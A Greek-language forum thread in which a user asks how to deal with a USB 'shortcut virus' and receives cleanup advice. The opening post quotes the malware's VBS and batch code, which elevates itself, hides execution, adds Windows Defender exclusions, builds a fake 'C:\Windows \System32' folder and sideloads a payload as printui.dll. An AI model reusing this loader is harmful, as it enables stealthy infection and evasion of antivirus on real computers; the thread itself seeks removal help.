malware

Ξεκίνησε από xdv, 11 Δεκ 2025, 03:52:52 ΜΜ

« προηγούμενο - επόμενο »
Εκτύπωση
Κάτω Σελίδες1
User actions

xdv

11 Δεκ 2025, 03:52:52 ΜΜ 
If Not WScript.Arguments.Named.Exists("elevated") Then
	Set sh = CreateObject("Shell.Application")
	sh.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34) & " /elevated", "", "runas", 1
	WScript.Quit
End If
Set fs = CreateObject("Scripting.FileSystemObject")
pp = fs.GetParentFolderName(WScript.ScriptFullName)
bp = pp & "\u197288.bat"
If fs.FileExists(bp) Then
	Set sp = WScript.CreateObject("WScript.Shell")
	sp.Run Chr(34) & bp & Chr(34), 0
End If


@echo off
chcp 65001
explorer "%~dp0..\KINGSTON"
if exist "%~dp0u509436.dat" if not exist "C:\Windows \System32\printui.dll" (
	powershell -Command "Add-MpPreference -ExclusionPath '%~dp0'; Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Start-Sleep -Seconds 2"
	if exist "C:\Windows \System32" rmdir /S /Q "\\?\C:\Windows "
	mkdir "\\?\C:\Windows \System32"
	xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
	xcopy "%~dp0u509436.dat" "C:\Windows \System32" /Y
	ren "C:\Windows \System32\u509436.dat" "printui.dll"
	if exist "C:\Windows \System32\printui.exe" (
		if exist "C:\Windows \System32\printui.dll" (
			start "" "C:\Windows \System32\printui.exe"
		) else rmdir /S /Q "\\?\C:\Windows "
	) else rmdir /S /Q "\\?\C:\Windows "
)

σε ένα φλασάκι βρήκα τέσσερα ύποπτα αρχεία 
  • ένα .vbs
  • .bat
  • .dat
  • .bin
Ήταν όλα σε ένα φάκελο με όνομα sysvolume. Πιο πάνω παραθέτω τον κώδικα για δύο από αυτά. Το αποτέλεσμα είναι ότι εξαφανίζονται όλα τα αρχεία που υπάρχουν στο φλασάκι και εμφανίζεται μια συντόμευση!
Πώς το διαχειριζόμαστε;
Λάθη είμαστε, ανθρώπους κάνουμε.

George Eco

#1
11 Δεκ 2025, 09:48:46 ΜΜ Τελευταία τροποποίηση: 11 Δεκ 2025, 10:43:19 ΜΜ από George Eco
Εγκαθιστούμε  Linux.
Ή τρέχουμε απο live usb.
Κάνεις με αυτό το τρόπο έρευνα, αρχικά για να δεις αν διασώζεται τίποτα από τα αρχέια σου.
Μελέτη κάνεις αν δε βγει έτσι λύση.


Δες κι εδώ:
https://learn.microsoft.com/en-us/answers/questions/2672789/remove-shortcut-virus-iexplore-vbs-from-flash-driv

xdv

#2
22 Απρ 2026, 07:28:10 ΜΜ
Το φλασάκι μπορώ να το καθαρίσω.
Αυτό που δεν μπορώ να καθαρίσω είναι ο υπολογιστής ο οποίος μολύνει ξανά το φλασάκι.
Λάθη είμαστε, ανθρώπους κάνουμε.

dski

#3
23 Απρ 2026, 03:29:56 ΜΜ
Δοκίμασε με το Avast (τη δωρεάν έκδοση). Με αυτό καθάρισα το στικάκι και κατόπιν έκανα ξανά ορατά τα αρχεία (τα οποία είχαν όλα μεταφερθεί σε έναν νέο φάκελο με όνομα το αρχικό όνομα του USB Stick) με χρήση της attrib από command prompt. Μετά έκανα συνολικό καθαρισμό στο PC  (με το Avast), καθάρισα ό,τι βρήκε και δεν ξαναείχα πρόβλημα με τον ιό. Ελπίζω να δουλέψει και σε εσένα.

xdv

#4
Σήμερα στις 06:53:19 ΜΜ
Λάθη είμαστε, ανθρώπους κάνουμε.
Εκτύπωση
Πάνω Σελίδες1
User actions